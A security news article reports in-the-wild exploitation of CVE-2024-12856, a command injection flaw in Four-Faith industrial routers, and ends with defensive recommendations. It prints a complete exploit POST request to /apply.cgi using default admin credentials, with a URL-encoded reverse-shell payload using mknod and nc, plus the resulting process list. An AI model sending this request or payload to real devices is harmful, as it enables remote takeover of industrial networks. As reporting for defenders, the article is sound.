Four-Faith Industrial Routers Vulnerability Exploited in the Wild to Gain Remote Access

A significant post-authentication vulnerability affecting Four-Faith industrial routers has been actively exploited in the wild.

Assigned as CVE-2024-12856, this flaw allows attackers to execute unauthenticated remote command injections by leveraging the routers’ default credentials.

Details of the Exploitation

The vulnerability impacts at least two Four-Faith router models—F3x24 and F3x36.

It involves leveraging the /apply.cgi endpoint over HTTP by exploiting the adj_time_year parameter during system time modifications using the submit_type=adjust_sys_time action.

2024 MITRE ATT&CK Evaluation Results for SMEs & MSPs -> Download Free Guide

Attackers have been able to inject OS commands, which can be used to gain unauthorized remote access or launch reverse shells. A real-world example of the malicious payload sent via a POST request is as follows:

POST /apply.cgi HTTP/1.1

Host: 192.168.1.1:90

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36

Content-Length: 296

Authorization: Basic YWRtaW46YWRtaW4=

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip

adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time

Once injected, the attacker can execute commands. The running process on the vulnerable device may look like this:

20938 admin     1640 S    sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin

20943 admin     1636 S    /bin/sh -i

20945 admin     1636 S    nc 192.168.1.206 1270

VulnCheck observed malicious activity from the IP address 178.215.238[.]91, attempting to exploit this vulnerability with a payload matching earlier patterns.

A related blog post from November 2024 also documented similar exploitation attempts, confirming this vulnerability’s active exploitation in the wild.

Organizations using Four-Faith routers are strongly encouraged to:

1. Change Default Credentials: Immediately update the default login credentials to secure values.
2. Patch Systems: Consult Four-Faith for available firmware updates or patches targeting CVE-2024-12856.
3. Monitor Network Traffic: Deploy the Suricata rule provided to detect ongoing exploit attempts.
4. Segregate Networks: Isolate industrial control systems (ICS) from external networks to reduce attack vectors.

By addressing this vulnerability proactively, organizations can mitigate the risks posed by CVE-2024-12856.

Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free